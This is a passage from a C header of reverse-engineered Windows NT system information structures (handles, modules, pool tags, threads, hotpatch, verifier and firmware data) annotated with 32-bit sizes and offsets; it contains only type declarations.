FLG_ENABLE_KDEBUG_SYMBOL_LOAD=0x00040000,
FLG_ENABLE_HANDLE_TYPE_TAGGING=0x01000000,
FLG_HEAP_PAGE_ALLOCS=0x02000000,
FLG_POOL_ENABLE_TAGGING=0x00000400,
FLG_ENABLE_SYSTEM_CRIT_BREAKS=0x00100000,
FLG_MAINTAIN_OBJECT_TYPELIST=0x00004000,
FLG_MONITOR_SILENT_PROCESS_EXIT=0x00000200,
FLG_SHOW_LDR_SNAPS=0x00000002,
FLG_STOP_ON_EXCEPTION=0x00000001,
FLG_STOP_ON_HUNG_GUI=0x00000008
} SYSTEM_GLOBAL_FLAGS;
struct _SYSTEM_FLAGS_INFORMATION // Size=4
{
SYSTEM_GLOBAL_FLAGS Flags; // Size=4 Offset=0
};
struct _SYSTEM_CALL_TIME_INFORMATION // Size=16
{
ULONG Length; // Size=4 Offset=0
ULONG TotalCalls; // Size=4 Offset=4
LARGE_INTEGER TimeOfCalls[1]; // Size=8 Offset=8
};
typedef struct _SYSTEM_MODULE // Size=280
{
USHORT Reserved1; // Size=2 Offset=0
USHORT Reserved2; // Size=2 Offset=2
ULONG ImageBaseAddress; // Size=4 Offset=4
ULONG ImageSize; // Size=4 Offset=8
ULONG Flags; // Size=4 Offset=12
USHORT Index; // Size=2 Offset=16
USHORT Rank; // Size=2 Offset=18
USHORT LoadCount; // Size=2 Offset=20
USHORT NameOffset; // Size=2 Offset=22
UCHAR Name[256]; // Size=256 Offset=24
} SYSTEM_MODULE;
struct _SYSTEM_MODULE_INFORMATION // Size=284
{
ULONG Count; // Size=4 Offset=0
SYSTEM_MODULE Modules[1]; // Size=280 Offset=4
};
typedef struct _SYSTEM_LOCK // Size=36
{
PVOID Address; // Size=4 Offset=0
USHORT Type; // Size=2 Offset=4
USHORT Reserved1; // Size=2 Offset=6
ULONG ExclusiveOwnerThreadId; // Size=4 Offset=8
ULONG ActiveCount; // Size=4 Offset=12
ULONG ContentionCount; // Size=4 Offset=16
ULONG Reserved2[2]; // Size=8 Offset=20
ULONG NumberOfSharedWaiters; // Size=4 Offset=28
ULONG NumberOfExclusiveWaiters; // Size=4 Offset=32
} SYSTEM_LOCK;
struct _SYSTEM_LOCK_INFORMATION // Size=40
{
ULONG Count; // Size=4 Offset=0
SYSTEM_LOCK Locks[1]; // Size=36 Offset=4
};
typedef enum _SYSTEM_HANDLE_FLAGS
{
PROTECT_FROM_CLOSE=1,
INHERIT=2
} SYSTEM_HANDLE_FLAGS;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO // Size=16
{
USHORT UniqueProcessId; // Size=2 Offset=0
USHORT CreatorBackTraceIndex; // Size=2 Offset=2
UCHAR ObjectTypeIndex; // Size=1 Offset=4
SYSTEM_HANDLE_FLAGS HandleAttributes; // Size=1 Offset=5
USHORT HandleValue; // Size=2 Offset=6
PVOID Object; // Size=4 Offset=8
ULONG GrantedAccess; // Size=4 Offset=12
} SYSTEM_HANDLE_TABLE_ENTRY_INFO;
struct _SYSTEM_HANDLE_INFORMATION // Size=20
{
ULONG NumberOfHandles; // Size=4 Offset=0
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; // Size=16 Offset=4
};
struct _SYSTEM_OBJECTTYPE_INFORMATION // Size=56
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG NumberOfObjects; // Size=4 Offset=4
ULONG NumberOfHandles; // Size=4 Offset=8
ULONG TypeIndex; // Size=4 Offset=12
ULONG InvalidAttributes; // Size=4 Offset=16
GENERIC_MAPPING GenericMapping; // Size=16 Offset=20
ULONG ValidAccessMask; // Size=4 Offset=36
ULONG PoolType; // Size=4 Offset=40
UCHAR SecurityRequired; // Size=1 Offset=44
UCHAR WaitableObject; // Size=1 Offset=45
UNICODE_STRING TypeName; // Size=8 Offset=48
};
typedef struct _OBJECT_NAME_INFORMATION // Size=8
{
UNICODE_STRING Name; // Size=8 Offset=0
} OBJECT_NAME_INFORMATION;
struct _SYSTEM_OBJECT_INFORMATION // Size=48
{
ULONG NextEntryOffset; // Size=4 Offset=0
PVOID Object; // Size=4 Offset=4
PVOID CreatorUniqueProcess; // Size=4 Offset=8
USHORT CreatorBackTraceIndex; // Size=2 Offset=12
USHORT Flags; // Size=2 Offset=14
LONG PointerCount; // Size=4 Offset=16
LONG HandleCount; // Size=4 Offset=20
ULONG PagedPoolCharge; // Size=4 Offset=24
ULONG NonPagedPoolCharge; // Size=4 Offset=28
PVOID ExclusiveProcessId; // Size=4 Offset=32
PVOID SecurityDescriptor; // Size=4 Offset=36
OBJECT_NAME_INFORMATION NameInfo; // Size=8 Offset=40
};
struct _SYSTEM_PAGEFILE_INFORMATION // Size=24
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG TotalSize; // Size=4 Offset=4
ULONG TotalInUse; // Size=4 Offset=8
ULONG PeakUsage; // Size=4 Offset=12
UNICODE_STRING PageFileName; // Size=8 Offset=16
};
struct _SYSTEM_VDM_INSTEMUL_INFO // Size=136
{
ULONG SegmentNotPresent; // Size=4 Offset=0
ULONG VdmOpcode0F; // Size=4 Offset=4
ULONG OpcodeESPrefix; // Size=4 Offset=8
ULONG OpcodeCSPrefix; // Size=4 Offset=12
ULONG OpcodeSSPrefix; // Size=4 Offset=16
ULONG OpcodeDSPrefix; // Size=4 Offset=20
ULONG OpcodeFSPrefix; // Size=4 Offset=24
ULONG OpcodeGSPrefix; // Size=4 Offset=28
ULONG OpcodeOPER32Prefix; // Size=4 Offset=32
ULONG OpcodeADDR32Prefix; // Size=4 Offset=36
ULONG OpcodeINSB; // Size=4 Offset=40
ULONG OpcodeINSW; // Size=4 Offset=44
ULONG OpcodeOUTSB; // Size=4 Offset=48
ULONG OpcodeOUTSW; // Size=4 Offset=52
ULONG OpcodePUSHF; // Size=4 Offset=56
ULONG OpcodePOPF; // Size=4 Offset=60
ULONG OpcodeINTnn; // Size=4 Offset=64
ULONG OpcodeINTO; // Size=4 Offset=68
ULONG OpcodeIRET; // Size=4 Offset=72
ULONG OpcodeINBimm; // Size=4 Offset=76
ULONG OpcodeINWimm; // Size=4 Offset=80
ULONG OpcodeOUTBimm; // Size=4 Offset=84
ULONG OpcodeOUTWimm; // Size=4 Offset=88
ULONG OpcodeINB; // Size=4 Offset=92
ULONG OpcodeINW; // Size=4 Offset=96
ULONG OpcodeOUTB; // Size=4 Offset=100
ULONG OpcodeOUTW; // Size=4 Offset=104
ULONG OpcodeLOCKPrefix; // Size=4 Offset=108
ULONG OpcodeREPNEPrefix; // Size=4 Offset=112
ULONG OpcodeREPPrefix; // Size=4 Offset=116
ULONG OpcodeHLT; // Size=4 Offset=120
ULONG OpcodeCLI; // Size=4 Offset=124
ULONG OpcodeSTI; // Size=4 Offset=128
ULONG BopCount; // Size=4 Offset=132
};
struct _SYSTEM_FILECACHE_INFORMATION // Size=36
{
ULONG CurrentSize; // Size=4 Offset=0
ULONG PeakSize; // Size=4 Offset=4
ULONG PageFaultCount; // Size=4 Offset=8
ULONG MinimumWorkingSet; // Size=4 Offset=12
ULONG MaximumWorkingSet; // Size=4 Offset=16
ULONG CurrentSizeIncludingTransitionInPages; // Size=4 Offset=20
ULONG PeakSizeIncludingTransitionInPages; // Size=4 Offset=24
ULONG TransitionRePurposeCount; // Size=4 Offset=28
ULONG Flags; // Size=4 Offset=32
};
typedef struct _SYSTEM_POOLTAG // Size=28
{
UCHAR Tag[4]; // Size=4 Offset=0
ULONG PagedAllocs; // Size=4 Offset=4
ULONG PagedFrees; // Size=4 Offset=8
ULONG PagedUsed; // Size=4 Offset=12
ULONG NonPagedAllocs; // Size=4 Offset=16
ULONG NonPagedFrees; // Size=4 Offset=20
ULONG NonPagedUsed; // Size=4 Offset=24
} SYSTEM_POOLTAG;
struct _SYSTEM_POOLTAG_INFORMATION // Size=32
{
ULONG Count; // Size=4 Offset=0
SYSTEM_POOLTAG TagInfo[1]; // Size=28 Offset=4
};
struct _SYSTEM_INTERRUPT_INFORMATION // Size=24
{
ULONG ContextSwitches; // Size=4 Offset=0
ULONG DpcCount; // Size=4 Offset=4
ULONG DpcRate; // Size=4 Offset=8
ULONG TimeIncrement; // Size=4 Offset=12
ULONG DpcBypassCount; // Size=4 Offset=16
ULONG ApcBypassCount; // Size=4 Offset=20
};
struct _SYSTEM_DPC_BEHAVIOR_INFORMATION // Size=20
{
ULONG Spare; // Size=4 Offset=0
ULONG DpcQueueDepth; // Size=4 Offset=4
ULONG MinimumDpcRate; // Size=4 Offset=8
ULONG AdjustDpcThreshold; // Size=4 Offset=12
ULONG IdealDpcRate; // Size=4 Offset=16
};
typedef struct _IMAGE_EXPORT_DIRECTORY // Size=40
{
ULONG Characteristics; // Size=4 Offset=0
ULONG TimeDateStamp; // Size=4 Offset=4
USHORT MajorVersion; // Size=2 Offset=8
USHORT MinorVersion; // Size=2 Offset=10
ULONG Name; // Size=4 Offset=12
ULONG Base; // Size=4 Offset=16
ULONG NumberOfFunctions; // Size=4 Offset=20
ULONG NumberOfNames; // Size=4 Offset=24
ULONG AddressOfFunctions; // Size=4 Offset=28
ULONG AddressOfNames; // Size=4 Offset=32
ULONG AddressOfNameOrdinals; // Size=4 Offset=36
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
struct _SYSTEM_LOADED_GDI_DRIVER_INFORMATION // Size=28
{
UNICODE_STRING DriverName; // Size=8 Offset=0
PVOID ImageAddress; // Size=4 Offset=8
PVOID SectionPointer; // Size=4 Offset=12
PVOID EntryPoint; // Size=4 Offset=16
PIMAGE_EXPORT_DIRECTORY ExportSectionPointer; // Size=4 Offset=20
ULONG ImageLength; // Size=4 Offset=24
};
struct _SYSTEM_UNLOADED_GDI_DRIVER_INFORMATION // Size=28
{
PVOID ImageAddress; // Size=4 Offset=0
};
struct _SYSTEM_CRASH_DUMP_INFORMATION
{
HANDLE CrashDumpSectionHandle; // Size=4 Offset=0
};
struct _SYSTEM_EXCEPTION_INFORMATION // Size=16
{
ULONG AlignmentFixupCount; // Size=4 Offset=0
ULONG ExceptionDispatchCount; // Size=4 Offset=4
ULONG FloatingEmulationCount; // Size=4 Offset=8
ULONG ByteWordEmulationCount; // Size=4 Offset=12
};
typedef enum _SYSTEM_CRASH_DUMP_CONFIGURATION_CLASS
{
SystemCrashDumpDisable=0,
SystemCrashDumpReconfigure=1,
SystemCrashDumpInitializationComplete=2
} SYSTEM_CRASH_DUMP_CONFIGURATION_CLASS;
struct _SYSTEM_CRASH_DUMP_STATE_INFORMATION // Size=4
{
SYSTEM_CRASH_DUMP_CONFIGURATION_CLASS CrashDumpConfigurationClass; // Size=4 Offset=0
};
struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION // Size=2
{
UCHAR KernelDebuggerEnabled; // Size=1 Offset=0
UCHAR KernelDebuggerNotPresent; // Size=1 Offset=1
};
struct _SYSTEM_PRIORITY_SEPARATION
{
ULONG PrioritySeparation; // Size=4 Offset=0
};
typedef struct _SYSTEMTIME {
WORD wYear; // Size=2 Offset=0
WORD wMonth; // Size=2 Offset=2
WORD wDayOfWeek; // Size=2 Offset=4
WORD wDay; // Size=2 Offset=6
WORD wHour; // Size=2 Offset=8
WORD wMinute; // Size=2 Offset=10
WORD wSecond; // Size=2 Offset=12
WORD wMilliseconds; // Size=2 Offset=14
} SYSTEMTIME;
struct _SYSTEM_TIME_ZONE_INFORMATION
{
LONG Bias;
WCHAR StandardName[32];
SYSTEMTIME StandardDate;
LONG StandardBias;
WCHAR DaylightName[32];
SYSTEMTIME DaylightDate;
LONG DaylightBias;
};
struct _SYSTEM_CONTEXT_SWITCH_INFORMATION // Size=48
{
ULONG ContextSwitches; // Size=4 Offset=0
ULONG FindAny; // Size=4 Offset=4
ULONG FindLast; // Size=4 Offset=8
ULONG FindIdeal; // Size=4 Offset=12
ULONG IdleAny; // Size=4 Offset=16
ULONG IdleCurrent; // Size=4 Offset=20
ULONG IdleLast; // Size=4 Offset=24
ULONG IdleIdeal; // Size=4 Offset=28
ULONG PreemptAny; // Size=4 Offset=32
ULONG PreemptCurrent; // Size=4 Offset=36
ULONG PreemptLast; // Size=4 Offset=40
ULONG SwitchToIdle; // Size=4 Offset=44
};
struct _SYSTEM_REGISTRY_QUOTA_INFORMATION // Size=12
{
ULONG RegistryQuotaAllowed; // Size=4 Offset=0
ULONG RegistryQuotaUsed; // Size=4 Offset=4
ULONG PagedPoolSize; // Size=4 Offset=8
};
struct _SYSTEM_PROCESSOR_IDLE_INFORMATION // Size=48
{
ULONGLONG IdleTime; // Size=8 Offset=0
ULONGLONG C1Time; // Size=8 Offset=8
ULONGLONG C2Time; // Size=8 Offset=16
ULONGLONG C3Time; // Size=8 Offset=24
ULONG C1Transitions; // Size=4 Offset=32
ULONG C2Transitions; // Size=4 Offset=36
ULONG C3Transitions; // Size=4 Offset=40
ULONG Padding; // Size=4 Offset=44
};
struct _SYSTEM_LEGACY_DRIVER_INFORMATION // Size=12
{
ULONG VetoType; // Size=4 Offset=0
UNICODE_STRING VetoList; // Size=8 Offset=4
};
typedef enum _POOL_TYPE {
NonPagedPool,
NonPagedPoolExecute = NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed = NonPagedPool + 2,
DontUseThisType,
NonPagedPoolCacheAligned = NonPagedPool + 4,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
MaxPoolType,
NonPagedPoolBase = 0,
NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
NonPagedPoolSession = 32,
PagedPoolSession = NonPagedPoolSession + 1,
NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
NonPagedPoolNx = 512,
NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
NonPagedPoolSessionNx = NonPagedPoolNx + 32
} POOL_TYPE;
struct _SYSTEM_LOOKASIDE_INFORMATION // Size=32
{
USHORT CurrentDepth; // Size=2 Offset=0
USHORT MaximumDepth; // Size=2 Offset=2
ULONG TotalAllocates; // Size=4 Offset=4
ULONG AllocateMisses; // Size=4 Offset=8
ULONG TotalFrees; // Size=4 Offset=12
ULONG FreeMisses; // Size=4 Offset=16
POOL_TYPE Type; // Size=4 Offset=20
ULONG Tag; // Size=4 Offset=24
ULONG Size; // Size=4 Offset=28
};
struct _SYSTEM_SET_TIME_SLIP_EVENT
{
HANDLE TimeSlipEvent;
};
struct _SYSTEM_SESSION
{
ULONG SessionId;
};
struct _SYSTEM_RANGE_START_INFORMATION
{
PVOID SystemRangeStart;
};
typedef struct _SYSTEM_VERIFIER_INFORMATION // Size=104
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG Level; // Size=4 Offset=4
UNICODE_STRING DriverName; // Size=8 Offset=8
ULONG RaiseIrqls; // Size=4 Offset=16
ULONG AcquireSpinLocks; // Size=4 Offset=20
ULONG SynchronizeExecutions; // Size=4 Offset=24
ULONG AllocationsAttempted; // Size=4 Offset=28
ULONG AllocationsSucceeded; // Size=4 Offset=32
ULONG AllocationsSucceededSpecialPool; // Size=4 Offset=36
ULONG AllocationsWithNoTag; // Size=4 Offset=40
ULONG TrimRequests; // Size=4 Offset=44
ULONG Trims; // Size=4 Offset=48
ULONG AllocationsFailed; // Size=4 Offset=52
ULONG AllocationsFailedDeliberately; // Size=4 Offset=56
ULONG Loads; // Size=4 Offset=60
ULONG Unloads; // Size=4 Offset=64
ULONG UnTrackedPool; // Size=4 Offset=68
ULONG CurrentPagedPoolAllocations; // Size=4 Offset=72
ULONG CurrentNonPagedPoolAllocations; // Size=4 Offset=76
ULONG PeakPagedPoolAllocations; // Size=4 Offset=80
ULONG PeakNonPagedPoolAllocations; // Size=4 Offset=84
ULONG PagedPoolUsageInBytes; // Size=4 Offset=88
ULONG NonPagedPoolUsageInBytes; // Size=4 Offset=92
ULONG PeakPagedPoolUsageInBytes; // Size=4 Offset=96
ULONG PeakNonPagedPoolUsageInBytes; // Size=4 Offset=100
} SYSTEM_VERIFIER_INFORMATION;
struct _SYSTEM_SESSION_PROCESS_INFORMATION // Size=12
{
ULONG SessionId; // Size=4 Offset=0
ULONG SizeOfBuf; // Size=4 Offset=4
PVOID Buffer; // Size=4 Offset=8
};
typedef struct _SYSTEM_POOL_BLOCK
{
BOOLEAN Allocated;
USHORT Unknown;
ULONG Size;
CHAR Tag[4];
} SYSTEM_POOL_BLOCK;
struct _SYSTEM_POOL_BLOCKS_INFORMATION
{
ULONG PoolSize;
PVOID PoolBase;
USHORT PoolAlignment;
ULONG NumberOfBlocks;
SYSTEM_POOL_BLOCK PoolBlocks[1];
};
typedef struct _SYSTEM_MEMORY_USAGE
{
PVOID Name;
USHORT Valid;
USHORT Standby;
USHORT Modified;
USHORT PageTables;
} SYSTEM_MEMORY_USAGE;
struct _SYSTEM_MEMORY_USAGE_INFORMATION
{
ULONG Reserved;
PVOID EndOfData;
SYSTEM_MEMORY_USAGE MemoryUsage[1];
};
typedef struct _CLIENT_ID // Size=8
{
PVOID UniqueProcess; // Size=4 Offset=0
PVOID UniqueThread; // Size=4 Offset=4
} CLIENT_ID;
typedef struct _SYSTEM_THREAD_INFORMATION // Size=64
{
LARGE_INTEGER KernelTime; // Size=8 Offset=0
LARGE_INTEGER UserTime; // Size=8 Offset=8
LARGE_INTEGER CreateTime; // Size=8 Offset=16
ULONG WaitTime; // Size=4 Offset=24
PVOID StartAddress; // Size=4 Offset=28
CLIENT_ID ClientId; // Size=8 Offset=32
LONG Priority; // Size=4 Offset=40
LONG BasePriority; // Size=4 Offset=44
ULONG ContextSwitches; // Size=4 Offset=48
ULONG ThreadState; // Size=4 Offset=52
ULONG WaitReason; // Size=4 Offset=56
} SYSTEM_THREAD_INFORMATION;
typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION // Size=96
{
SYSTEM_THREAD_INFORMATION ThreadInfo; // Size=64 Offset=0
PVOID StackBase; // Size=4 Offset=64
PVOID StackLimit; // Size=4 Offset=68
PVOID Win32StartAddress; // Size=4 Offset=72
PVOID TebBase; // Size=4 Offset=76
ULONG Reserved2; // Size=4 Offset=80
ULONG Reserved3; // Size=4 Offset=84
ULONG Reserved4; // Size=4 Offset=88
} SYSTEM_EXTENDED_THREAD_INFORMATION;
// I have not validated this structure
struct _SYSTEM_EXTENDED_PROCESS_INFORMATION
{
SYSTEM_PROCESS_INFORMATION ProcessInfo;
SYSTEM_EXTENDED_THREAD_INFORMATION ThreadInfo;
};
struct _SYSTEM_PROCESSOR_POWER_INFORMATION // Size=72
{
UCHAR CurrentFrequency; // Size=1 Offset=0
UCHAR ThermalLimitFrequency; // Size=1 Offset=1
UCHAR ConstantThrottleFrequency; // Size=1 Offset=2
UCHAR DegradedThrottleFrequency; // Size=1 Offset=3
UCHAR LastBusyFrequency; // Size=1 Offset=4
UCHAR LastC3Frequency; // Size=1 Offset=5
UCHAR LastAdjustedBusyFrequency; // Size=1 Offset=6
UCHAR ProcessorMinThrottle; // Size=1 Offset=7
UCHAR ProcessorMaxThrottle; // Size=1 Offset=8
ULONG NumberOfFrequencies; // Size=4 Offset=12
ULONG PromotionCount; // Size=4 Offset=16
ULONG DemotionCount; // Size=4 Offset=20
ULONG ErrorCount; // Size=4 Offset=24
ULONG RetryCount; // Size=4 Offset=28
ULONGLONG CurrentFrequencyTime; // Size=8 Offset=32
ULONGLONG CurrentProcessorTime; // Size=8 Offset=40
ULONGLONG CurrentProcessorIdleTime; // Size=8 Offset=48
ULONGLONG LastProcessorTime; // Size=8 Offset=56
ULONGLONG LastProcessorIdleTime; // Size=8 Offset=64
};
struct SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX // Size=28
{
PVOID Object; // Size=4 Offset=0
ULONG UniqueProcessId; // Size=4 Offset=4
ULONG HandleValue; // Size=4 Offset=8
ULONG GrantedAccess; // Size=4 Offset=12
USHORT CreatorBackTraceIndex; // Size=2 Offset=16
USHORT ObjectTypeIndex; // Size=2 Offset=18
ULONG HandleAttributes; // Size=4 Offset=20
ULONG Reserved; // Size=4 Offset=24
};
struct _SYSTEM_HANDLE_INFORMATION_EX // Size=36
{
ULONG NumberOfHandles; // Size=4 Offset=0
ULONG Reserved; // Size=4 Offset=4
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; // Size=28 Offset=8
};
typedef struct _SYSTEM_BIGPOOL_ENTRY // Size=12
{
PVOID VirtualAddress; // Size=4 Offset=0
ULONG SizeInBytes; // Size=4 Offset=4
UCHAR Tag[4]; // Size=4 Offset=8
} SYSTEM_BIGPOOL_ENTRY;
struct _SYSTEM_BIGPOOL_INFORMATION // Size=16
{
ULONG Count; // Size=4 Offset=0
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; // Size=12 Offset=4
};
struct _SYSTEM_SESSION_POOLTAG_INFORMATION // Size=40
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG SessionId; // Size=4 Offset=4
ULONG Count; // Size=4 Offset=8
SYSTEM_POOLTAG TagInfo[1]; // Size=28 Offset=12
};
struct _SYSTEM_SESSION_MAPPED_VIEW_INFORMATION // Size=20
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG SessionId; // Size=4 Offset=4
ULONG ViewFailures; // Size=4 Offset=8
ULONG NumberOfBytesAvailable; // Size=4 Offset=12
ULONG NumberOfBytesAvailableContiguous; // Size=4 Offset=16
};
typedef struct _HOTPATCH_HOOK_DESCRIPTOR // Size=40
{
ULONGLONG TargetAddress; // Size=8 Offset=0
ULONGLONG MappedAddress; // Size=8 Offset=8
ULONG CodeOffset; // Size=4 Offset=16
ULONG CodeSize; // Size=4 Offset=20
ULONG OrigCodeOffset; // Size=4 Offset=24
ULONG ValidationOffset; // Size=4 Offset=28
ULONG ValidationSize; // Size=4 Offset=32
} HOTPATCH_HOOK_DESCRIPTOR;
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_KERNEL_INFO // Size=4
{
USHORT NameOffset; // Size=2 Offset=0
USHORT NameLength; // Size=2 Offset=2
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_USERMODE_INFO // Size=14
{
USHORT NameOffset; // Size=2 Offset=0
USHORT NameLength; // Size=2 Offset=2
USHORT TargetNameOffset; // Size=2 Offset=4
USHORT TargetNameLength; // Size=2 Offset=6
USHORT ColdpatchImagePathOffset; // Size=2 Offset=8
USHORT ColdpatchImagePathLength; // Size=2 Offset=10
UCHAR PatchingFinished; // Size=1 Offset=12
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_INJECTION_INFO // Size=24
{
USHORT NameOffset; // Size=2 Offset=0
USHORT NameLength; // Size=2 Offset=2
USHORT TargetNameOffset; // Size=2 Offset=4
USHORT TargetNameLength; // Size=2 Offset=6
USHORT ColdpatchImagePathOffset; // Size=2 Offset=8
USHORT ColdpatchImagePathLength; // Size=2 Offset=10
ULONGLONG TargetProcess; // Size=8 Offset=16
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_ATOMIC_SWAP // Size=24
{
ULONGLONG ParentDirectory; // Size=8 Offset=0
ULONGLONG ObjectHandle1; // Size=8 Offset=8
ULONGLONG ObjectHandle2; // Size=8 Offset=16
};
struct _SYSTEM_HOTPATCH_CODE_INFORMATION_CODE_INFO // Size=48
{
ULONG DescriptorsCount; // Size=4 Offset=0
HOTPATCH_HOOK_DESCRIPTOR CodeDescriptors[1]; // Size=40 Offset=8
};
typedef enum _WATCHDOG_INFORMATION_CLASS
{
WdInfoTimeoutValue=0,
WdInfoResetTimer=1,
WdInfoStopTimer=2,
WdInfoStartTimer=3,
WdInfoTriggerAction=4,
WdInfoState=5
} WATCHDOG_INFORMATION_CLASS;
struct _SYSTEM_WATCHDOG_TIMER_INFORMATION // Size=8
{
WATCHDOG_INFORMATION_CLASS WdInfoClass; // Size=4 Offset=0
ULONG DataValue; // Size=4 Offset=4
};
struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION_PROCESSOR_CORE // Size=1
{
UCHAR Flags; // Size=1 Offset=0
};
struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION_NUMA_CODE // Size=4
{
ULONG NodeNumber; // Size=4 Offset=0
};
typedef enum _PROCESSOR_CACHE_TYPE
{
CacheUnified=0,
CacheInstruction=1,
CacheData=2,
CacheTrace=3
} PROCESSOR_CACHE_TYPE;
typedef enum _LOGICAL_PROCESSOR_RELATIONSHIP
{
RelationProcessorCore=0,
RelationNumaNode=1,
RelationCache=2,
RelationProcessorPackage=3,
RelationGroup=4,
RelationAll=65535
} LOGICAL_PROCESSOR_RELATIONSHIP;
struct _CACHE_DESCRIPTOR // Size=12
{
UCHAR Level; // Size=1 Offset=0
UCHAR Associativity; // Size=1 Offset=1
USHORT LineSize; // Size=2 Offset=2
ULONG Size; // Size=4 Offset=4
PROCESSOR_CACHE_TYPE Type; // Size=4 Offset=8
};
struct _SYSTEM_LOGICAL_PROCESSOR_INFORMATION // Size=24
{
ULONG ProcessorMask; // Size=4 Offset=0
LOGICAL_PROCESSOR_RELATIONSHIP Relationship; // Size=4 Offset=4
union
{
_SYSTEM_LOGICAL_PROCESSOR_INFORMATION_PROCESSOR_CORE ProcessorCore; // Size=1 Offset=8
_SYSTEM_LOGICAL_PROCESSOR_INFORMATION_NUMA_CODE NumaNode; // Size=4 Offset=8
_CACHE_DESCRIPTOR Cache; // Size=12 Offset=8
ULONGLONG Reserved[2]; // Size=16 Offset=8
};
};
typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION
{
SystemFirmwareTable_Enumerate=0,
SystemFirmwareTable_Get=1
} SYSTEM_FIRMWARE_TABLE_ACTION;
struct _SYSTEM_FIRMWARE_TABLE_INFORMATION // Size=20
{
ULONG ProviderSignature; // Size=4 Offset=0
SYSTEM_FIRMWARE_TABLE_ACTION Action; // Size=4 Offset=4
ULONG TableID; // Size=4 Offset=8
ULONG TableBufferLength; // Size=4 Offset=12
UCHAR TableBuffer[1]; // Size=1 Offset=16
};
struct _SYSTEM_VERIFIER_TRIAGE_INFORMATION // Size=544
{
ULONG ActionTaken; // Size=4 Offset=0
ULONG CrashData[5]; // Size=20 Offset=4
ULONG VerifierMode; // Size=4 Offset=24
ULONG VerifierFlags; // Size=4 Offset=28
WCHAR VerifierTargets[256]; // Size=512 Offset=32
};
struct _SYSTEM_MEMORY_LIST_INFORMATION // Size=88
{
ULONG ZeroPageCount; // Size=4 Offset=0
ULONG FreePageCount; // Size=4 Offset=4
ULONG ModifiedPageCount; // Size=4 Offset=8
ULONG ModifiedNoWritePageCount; // Size=4 Offset=12
ULONG BadPageCount; // Size=4 Offset=16
ULONG PageCountByPriority[8]; // Size=32 Offset=20
ULONG RepurposedPagesByPriority[8]; // Size=32 Offset=52
ULONG ModifiedPageCountPageFile; // Size=4 Offset=84
};
struct _SYSTEM_THREAD_CID_PRIORITY_INFORMATION // Size=12
{
CLIENT_ID ClientId; // Size=8 Offset=0
LONG Priority; // Size=4 Offset=8
};
struct _SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION // Size=8
{
ULONGLONG CycleTime; // Size=8 Offset=0
};
typedef struct _SYSTEM_VERIFIER_ISSUE // Size=16
{
ULONG IssueType; // Size=4 Offset=0
PVOID Address; // Size=4 Offset=4
ULONG Parameters[2]; // Size=8 Offset=8
} SYSTEM_VERIFIER_ISSUE;
struct _SYSTEM_VERIFIER_CANCELLATION_INFORMATION // Size=2068
{
ULONG CancelProbability; // Size=4 Offset=0
ULONG CancelThreshold; // Size=4 Offset=4
ULONG CompletionThreshold; // Size=4 Offset=8
ULONG CancellationVerifierDisabled; // Size=4 Offset=12
ULONG AvailableIssues; // Size=4 Offset=16
SYSTEM_VERIFIER_ISSUE Issues[128]; // Size=2048 Offset=20
};
struct _SYSTEM_REF_TRACE_INFORMATION // Size=20
{
UCHAR TraceEnable; // Size=1 Offset=0
UCHAR TracePermanent; // Size=1 Offset=1
UNICODE_STRING TraceProcessName; // Size=8 Offset=4
UNICODE_STRING TracePoolTags; // Size=8 Offset=12
};
struct _SYSTEM_SPECIAL_POOL_INFORMATION // Size=8
{
ULONG PoolTag; // Size=4 Offset=0
ULONG Flags; // Size=4 Offset=4
};
struct _SYSTEM_PROCESS_ID_INFORMATION // Size=12
{
PVOID ProcessId; // Size=4 Offset=0
UNICODE_STRING ImageName; // Size=8 Offset=4
};
typedef struct _GUID // Size=16
{
ULONG Data1; // Size=4 Offset=0
USHORT Data2; // Size=2 Offset=4
USHORT Data3; // Size=2 Offset=6
UCHAR Data4[8]; // Size=8 Offset=8
} GUID;
typedef enum _FIRMWARE_TYPE
{
FirmwareTypeUnknown=0,
FirmwareTypeBios=1,
FirmwareTypeUefi=2,
FirmwareTypeMax=3
} FIRMWARE_TYPE;
struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION // Size=32
{
GUID BootIdentifier; // Size=16 Offset=0
FIRMWARE_TYPE FirmwareType; // Size=4 Offset=16
ULONGLONG BootFlags; // Size=8 Offset=24
};
struct _SYSTEM_VERIFIER_INFORMATION_EX // Size=36
{
ULONG VerifyMode; // Size=4 Offset=0
ULONG OptionChanges; // Size=4 Offset=4
UNICODE_STRING PreviousBucketName; // Size=8 Offset=8
ULONG IrpCancelTimeoutMsec; // Size=4 Offset=16
ULONG VerifierExtensionEnabled; // Size=4 Offset=20
ULONG Reserved[3]; // Size=12 Offset=24
};
